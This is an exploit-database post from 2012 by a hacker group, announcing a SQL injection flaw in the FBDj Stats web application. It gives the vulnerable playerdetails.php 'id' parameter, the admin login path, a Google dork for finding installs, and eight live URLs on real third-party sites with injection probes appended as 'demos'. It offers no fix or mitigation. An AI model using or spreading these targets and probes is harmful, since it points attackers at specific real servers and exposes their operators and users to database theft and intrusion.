Home / exploits FBDj Stats SQL Injection
Posted on 12 September 2012
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 0 _ __ __ __ 1 1 /' __ /'__` / \__ /'__` 0 0 /\_, ___ /\_/\_ ___ ,_/ / _ ___ 1 1 /_/ /' _ ` / /_/_\_<_ /'___ / /`'__ 0 0 / / / / \__/ \_ \_ / 1 1 \_ \_ \_\_ \____/ \____\ \__\ \____/ \_ 0 0 /_//_//_/ \_ /___/ /____/ /__/ /___/ /_/ 1 1 \____/ >> Exploit database separated by exploit 0 0 /___/ type (local, remote, DoS, etc.) 1 1 1 0 [+] Site : 1337day.com 0 1 [+] Support e-mail : submit[at]1337day.com 1 0 0 1 ######################################### 1 0 I'm TUNISIAN CYBER member from Inj3ct0r Team 1 1 ######################################### 0 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1 [+] Author: TUNISIAN CYBER [+] Home: 1337day.com Inj3ct0r Exploit DataBase [+] Exploit Title: FBDj Stats SQL Injection Vulnerability [+] Date: 11-09-2012 [+] Category: WebApp [+] Google Dork: intext:"Generated by FBDj Stats" [+] Tested on: Windows 7 Professionnel / Windows XP SP3 EN [+] Vendor: http://www.warbirdsofprey.org/ ######################################################################################## Proof: 127.0.0.1/[PATH]/playerdetails.php?id=[number] Admin panel/login: 127.0.0.1/[PATH]/adminlogin.php Demos: http://89.171.41.105/stats/playerdetails.php?id=5' http://server.1jg2.net/stats/playerdetails.php?id=3' http://www.letkaorel.eu/warstats/playerdetails.php?id=13' http://sovstats.war-clouds.com/playerdetails.php?id=9' http://stats.jgace.net/stats/playerdetails.php?id=91' http://mc.sychrovnet.cz/il-2/playerdetails.php?id=30' http://www.war-birds.com/stats/playerdetails.php?id=34' http://www.kampfverband13.de/il2-stats/playerdetails.php?id=29' More in Google =) ######################################################################################## Greets to: TN H4CK3RZ( Badi - xMax-tn - jasserimath - pipo issam - anas laribi - xtrch set) , r00tw0rm members and Inj3ct0r Team ###########################################################################################
